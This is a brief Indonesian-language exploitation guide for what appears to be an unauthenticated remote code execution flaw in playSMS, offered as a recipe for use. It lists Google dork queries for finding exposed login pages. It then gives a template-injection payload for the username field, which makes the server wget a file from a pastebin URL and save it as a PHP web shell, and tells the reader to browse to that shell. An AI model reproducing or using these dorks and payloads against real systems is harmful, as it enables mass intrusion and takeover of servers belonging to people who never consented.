Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE :
- {{
wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}
Langkah-Langkah Exploitasi
kalian dorking dulu
jika sudah menemukan target maka akan muncul tempat login
pada bagian username, masukkan payload rce :
{{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian
masukkan payload RCE pada username
Access shell ?? site.com/shell.php / site.com/[path]/shell.php
Referensi :
https://sec.linuxploit.com/2020/04/playsms-unauthenticated-rce-upload-shell.html
